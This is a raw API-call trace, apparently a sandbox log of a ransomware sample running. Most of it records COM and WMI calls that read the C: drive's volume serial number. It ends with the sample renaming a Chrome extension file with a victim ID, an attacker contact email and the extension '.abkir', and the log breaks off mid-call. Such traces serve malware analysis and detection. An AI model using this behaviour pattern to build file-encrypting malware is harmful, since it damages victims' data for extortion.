WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x949e868 | out: puCount=0x949e868*=0x2) returned 0x0 [0210.320] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949e864*=0x0, pszText=0x0 | out: puBuffLength=0x949e864*=0xf, pszText=0x0) returned 0x0 [0210.320] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949e864*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e864*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0210.320] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e818 | out: ppv=0x949e818*=0xb51e34) returned 0x0 [0210.320] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e810 | out: pAptType=0x949e810*=1) returned 0x0 [0210.320] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e814 | out: ppvObject=0x949e814*=0x0) returned 0x80004002 [0210.320] IUnknown:Release (This=0xb51e34) returned 0x1 [0210.321] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e180 | out: ppv=0x949e180*=0x60274f0) returned 0x0 [0210.321] WbemDefPath:IUnknown:QueryInterface (in: This=0x60274f0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e398 | out: ppvObject=0x949e398*=0x0) returned 0x80004002 [0210.321] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60274f0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e3ac | out: ppvObject=0x949e3ac*=0x6030cc0) returned 0x0 [0210.321] WbemDefPath:IUnknown:Release (This=0x60274f0) returned 0x0 [0210.321] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030cc0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dfcc | out: ppvObject=0x949dfcc*=0x6030cc0) returned 0x0 [0210.321] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030cc0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949df88 | out: ppvObject=0x949df88*=0x0) returned 0x80004002 [0210.321] WbemDefPath:IUnknown:AddRef (This=0x6030cc0) returned 0x3 [0210.321] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030cc0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949d8e4 | out: ppvObject=0x949d8e4*=0x0) returned 0x80004002 [0210.321] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030cc0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949d894 | out: ppvObject=0x949d894*=0x0) returned 0x80004002 [0210.321] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030cc0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949d8a0 | out: ppvObject=0x949d8a0*=0x66ccad8) returned 0x0 [0210.321] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ccad8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949d8a8 | out: pCid=0x949d8a8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0210.322] WbemDefPath:IUnknown:Release (This=0x66ccad8) returned 0x3 [0210.322] CoGetContextToken (in: pToken=0x949d900 | out: pToken=0x949d900) returned 0x0 [0210.322] CoGetContextToken (in: pToken=0x949dd08 | out: pToken=0x949dd08) returned 0x0 [0210.322] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030cc0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dd98 | out: ppvObject=0x949dd98*=0x0) returned 0x80004002 [0210.322] WbemDefPath:IUnknown:Release (This=0x6030cc0) returned 0x2 [0210.322] WbemDefPath:IUnknown:Release (This=0x6030cc0) returned 0x1 [0210.322] CoGetContextToken (in: pToken=0x949e690 | out: pToken=0x949e690) returned 0x0 [0210.322] CoGetContextToken (in: pToken=0x949e5f0 | out: pToken=0x949e5f0) returned 0x0 [0210.322] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030cc0, riid=0x949e6c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e6bc | out: ppvObject=0x949e6bc*=0x6030cc0) returned 0x0 [0210.323] WbemDefPath:IUnknown:AddRef (This=0x6030cc0) returned 0x3 [0210.323] WbemDefPath:IUnknown:Release (This=0x6030cc0) returned 0x2 [0210.323] WbemDefPath:IWbemPath:SetText (This=0x6030cc0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0210.323] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030cc0, puCount=0x949e840 | out: puCount=0x949e840*=0x2) returned 0x0 [0210.323] WbemDefPath:IWbemPath:GetText (in: This=0x6030cc0, lFlags=4, puBuffLength=0x949e83c*=0x0, pszText=0x0 | out: puBuffLength=0x949e83c*=0xf, pszText=0x0) returned 0x0 [0210.323] WbemDefPath:IWbemPath:GetText (in: This=0x6030cc0, lFlags=4, puBuffLength=0x949e83c*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e83c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0210.323] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e840 | out: ppv=0x949e840*=0xb51e34) returned 0x0 [0210.323] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e838 | out: pAptType=0x949e838*=1) returned 0x0 [0210.323] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e83c | out: ppvObject=0x949e83c*=0x0) returned 0x80004002 [0210.323] IUnknown:Release (This=0xb51e34) returned 0x1 [0210.324] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e460 | out: ppv=0x949e460*=0x6024bc0) returned 0x0 [0210.324] WbemLocator:IUnknown:QueryInterface (in: This=0x6024bc0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e678 | out: ppvObject=0x949e678*=0x0) returned 0x80004002 [0210.324] WbemLocator:IClassFactory:CreateInstance (in: This=0x6024bc0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e68c | out: ppvObject=0x949e68c*=0x6027500) returned 0x0 [0210.324] WbemLocator:IUnknown:Release (This=0x6024bc0) returned 0x0 [0210.324] WbemLocator:IUnknown:QueryInterface (in: This=0x6027500, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e2ac | out: ppvObject=0x949e2ac*=0x6027500) returned 0x0 [0210.324] WbemLocator:IUnknown:QueryInterface (in: This=0x6027500, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e268 | out: ppvObject=0x949e268*=0x0) returned 0x80004002 [0210.324] WbemLocator:IUnknown:AddRef (This=0x6027500) returned 0x3 [0210.324] WbemLocator:IUnknown:QueryInterface (in: This=0x6027500, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dbc4 | out: ppvObject=0x949dbc4*=0x0) returned 0x80004002 [0210.325] WbemLocator:IUnknown:QueryInterface (in: This=0x6027500, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949db74 | out: ppvObject=0x949db74*=0x0) returned 0x80004002 [0210.325] WbemLocator:IUnknown:QueryInterface (in: This=0x6027500, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949db80 | out: ppvObject=0x949db80*=0x0) returned 0x80004002 [0210.325] CoGetContextToken (in: pToken=0x949dbe0 | out: pToken=0x949dbe0) returned 0x0 [0210.325] CoGetContextToken (in: pToken=0x949dfe8 | out: pToken=0x949dfe8) returned 0x0 [0210.325] WbemLocator:IUnknown:QueryInterface (in: This=0x6027500, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e078 | out: ppvObject=0x949e078*=0x0) returned 0x80004002 [0210.325] WbemLocator:IUnknown:Release (This=0x6027500) returned 0x2 [0210.325] WbemLocator:IUnknown:Release (This=0x6027500) returned 0x1 [0210.325] CoGetContextToken (in: pToken=0x949e658 | out: pToken=0x949e658) returned 0x0 [0210.325] CoGetContextToken (in: pToken=0x949e5b8 | out: pToken=0x949e5b8) returned 0x0 [0210.325] WbemLocator:IUnknown:QueryInterface (in: This=0x6027500, riid=0x949e688*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x949e684 | out: ppvObject=0x949e684*=0x6027500) returned 0x0 [0210.325] WbemLocator:IUnknown:AddRef (This=0x6027500) returned 0x3 [0210.325] WbemLocator:IUnknown:Release (This=0x6027500) returned 0x2 [0210.325] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030cc0, puCount=0x949e81c | out: puCount=0x949e81c*=0x2) returned 0x0 [0210.325] WbemDefPath:IWbemPath:GetText (in: This=0x6030cc0, lFlags=8, puBuffLength=0x949e818*=0x0, pszText=0x0 | out: puBuffLength=0x949e818*=0xf, pszText=0x0) returned 0x0 [0210.325] WbemDefPath:IWbemPath:GetText (in: This=0x6030cc0, lFlags=8, puBuffLength=0x949e818*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e818*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0210.325] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x949e6f4 | out: ppv=0x949e6f4*=0x6027490) returned 0x0 [0210.325] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027490, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x949e788 | out: ppNamespace=0x949e788*=0x6033844) returned 0x0 [0210.373] WbemLocator:IUnknown:QueryInterface (in: This=0x6033844, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e624 | out: ppvObject=0x949e624*=0xb5b224) returned 0x0 [0210.373] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5b224, pProxy=0x6033844, pAuthnSvc=0x949e674, pAuthzSvc=0x949e670, pServerPrincName=0x949e668, pAuthnLevel=0x949e66c, pImpLevel=0x949e65c, pAuthInfo=0x949e660, pCapabilites=0x949e664 | out: pAuthnSvc=0x949e674*=0xa, pAuthzSvc=0x949e670*=0x0, pServerPrincName=0x949e668, pAuthnLevel=0x949e66c*=0x6, pImpLevel=0x949e65c*=0x2, pAuthInfo=0x949e660, pCapabilites=0x949e664*=0x1) returned 0x0 [0210.373] WbemLocator:IUnknown:Release (This=0xb5b224) returned 0x1 [0210.373] WbemLocator:IUnknown:QueryInterface (in: This=0x6033844, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e618 | out: ppvObject=0x949e618*=0xb5b244) returned 0x0 [0210.373] WbemLocator:IUnknown:QueryInterface (in: This=0x6033844, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e614 | out: ppvObject=0x949e614*=0xb5b224) returned 0x0 [0210.373] WbemLocator:IClientSecurity:SetBlanket (This=0xb5b224, pProxy=0x6033844, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0210.374] WbemLocator:IUnknown:Release (This=0xb5b224) returned 0x2 [0210.374] WbemLocator:IUnknown:Release (This=0xb5b244) returned 0x1 [0210.374] CoTaskMemFree (pv=0xbd4a68) [0210.374] WbemLocator:IUnknown:Release (This=0x6027490) returned 0x0 [0210.374] WbemLocator:IUnknown:QueryInterface (in: This=0x6033844, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e214 | out: ppvObject=0x949e214*=0xb5b244) returned 0x0 [0210.374] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b244, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e1d0 | out: ppvObject=0x949e1d0*=0x0) returned 0x80004002 [0210.375] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b244, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949dfec | out: ppvObject=0x949dfec*=0x0) returned 0x80004002 [0210.375] WbemLocator:IUnknown:AddRef (This=0xb5b244) returned 0x3 [0210.375] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b244, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949db2c | out: ppvObject=0x949db2c*=0x0) returned 0x80004002 [0210.375] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b244, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949dadc | out: ppvObject=0x949dadc*=0x0) returned 0x80004002 [0210.376] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b244, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dae8 | out: ppvObject=0x949dae8*=0xb5b1a4) returned 0x0 [0210.376] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5b1a4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949daf0 | out: pCid=0x949daf0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0210.376] WbemLocator:IUnknown:Release (This=0xb5b1a4) returned 0x3 [0210.376] CoGetContextToken (in: pToken=0x949db48 | out: pToken=0x949db48) returned 0x0 [0210.376] CoGetContextToken (in: pToken=0x949df50 | out: pToken=0x949df50) returned 0x0 [0210.376] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b244, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dfe0 | out: ppvObject=0x949dfe0*=0xb5b22c) returned 0x0 [0210.376] WbemLocator:IRpcOptions:Query (in: This=0xb5b22c, pPrx=0xb5b244, dwProperty=2, pdwValue=0x949e008 | out: pdwValue=0x949e008) returned 0x80004002 [0210.376] WbemLocator:IUnknown:Release (This=0xb5b22c) returned 0x3 [0210.376] WbemLocator:IUnknown:Release (This=0xb5b244) returned 0x2 [0210.376] CoGetContextToken (in: pToken=0x949e528 | out: pToken=0x949e528) returned 0x0 [0210.377] CoGetContextToken (in: pToken=0x949e488 | out: pToken=0x949e488) returned 0x0 [0210.377] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b244, riid=0x949e558*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x949e554 | out: ppvObject=0x949e554*=0x6033844) returned 0x0 [0210.377] WbemLocator:IUnknown:AddRef (This=0x6033844) returned 0x4 [0210.377] WbemLocator:IUnknown:Release (This=0x6033844) returned 0x3 [0210.377] WbemLocator:IUnknown:Release (This=0x6033844) returned 0x2 [0210.377] SysStringLen (param_1=0x0) returned 0x0 [0210.377] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031120, puCount=0x949e8ec | out: puCount=0x949e8ec*=0x0) returned 0x0 [0210.377] WbemDefPath:IWbemPath:GetText (in: This=0x6031120, lFlags=2, puBuffLength=0x949e8e8*=0x0, pszText=0x0 | out: puBuffLength=0x949e8e8*=0x20, pszText=0x0) returned 0x0 [0210.377] WbemDefPath:IWbemPath:GetText (in: This=0x6031120, lFlags=2, puBuffLength=0x949e8e8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949e8e8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0210.377] CoGetContextToken (in: pToken=0x949e558 | out: pToken=0x949e558) returned 0x0 [0210.377] WbemLocator:IUnknown:AddRef (This=0xb5b244) returned 0x3 [0210.377] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b244, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e3ec | out: ppvObject=0x949e3ec*=0xb5b244) returned 0x0 [0210.377] WbemLocator:IUnknown:Release (This=0xb5b244) returned 0x3 [0210.377] WbemLocator:IUnknown:Release (This=0xb5b244) returned 0x2 [0210.377] WbemDefPath:IWbemPath:GetText (in: This=0x6031120, lFlags=2, puBuffLength=0x949e8f0*=0x0, pszText=0x0 | out: puBuffLength=0x949e8f0*=0x20, pszText=0x0) returned 0x0 [0210.377] WbemDefPath:IWbemPath:GetText (in: This=0x6031120, lFlags=2, puBuffLength=0x949e8f0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949e8f0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0210.378] IWbemServices:GetObject (in: This=0x6033844, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x949e8a4*=0x0, ppCallResult=0x0 | out: ppObject=0x949e8a4*=0x6028b10, ppCallResult=0x0) returned 0x0 [0210.403] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030cc0, puCount=0x949e8a4 | out: puCount=0x949e8a4*=0x2) returned 0x0 [0210.403] WbemDefPath:IWbemPath:GetText (in: This=0x6030cc0, lFlags=4, puBuffLength=0x949e8a0*=0x0, pszText=0x0 | out: puBuffLength=0x949e8a0*=0xf, pszText=0x0) returned 0x0 [0210.403] WbemDefPath:IWbemPath:GetText (in: This=0x6030cc0, lFlags=4, puBuffLength=0x949e8a0*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e8a0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0210.404] IWbemClassObject:Get (in: This=0x6028b10, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949e8a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3790e48*=0, plFlavor=0x3790e4c*=0 | out: pVal=0x949e8a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3790e48*=8, plFlavor=0x3790e4c*=0) returned 0x0 [0210.404] SysStringByteLen (bstr="9C354B42") returned 0x10 [0210.404] SysStringByteLen (bstr="9C354B42") returned 0x10 [0210.404] IWbemClassObject:Get (in: This=0x6028b10, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949e8a8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3790e48*=8, plFlavor=0x3790e4c*=0 | out: pVal=0x949e8a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3790e48*=8, plFlavor=0x3790e4c*=0) returned 0x0 [0210.404] SysStringByteLen (bstr="9C354B42") returned 0x10 [0210.404] SysStringByteLen (bstr="9C354B42") returned 0x10 [0210.404] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json", nBufferLength=0x105, lpBuffer=0x949e4a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json", lpFilePart=0x0) returned 0x97 [0210.404] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x949e4a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0xba [0210.404] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e908) returned 1 [0210.404] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json"), fInfoLevelId=0x0, lpFileInformation=0x949e984 | out: lpFileInformation=0x949e984*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x3704f860, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0210.405] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e904) returned 1 [0210.405] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 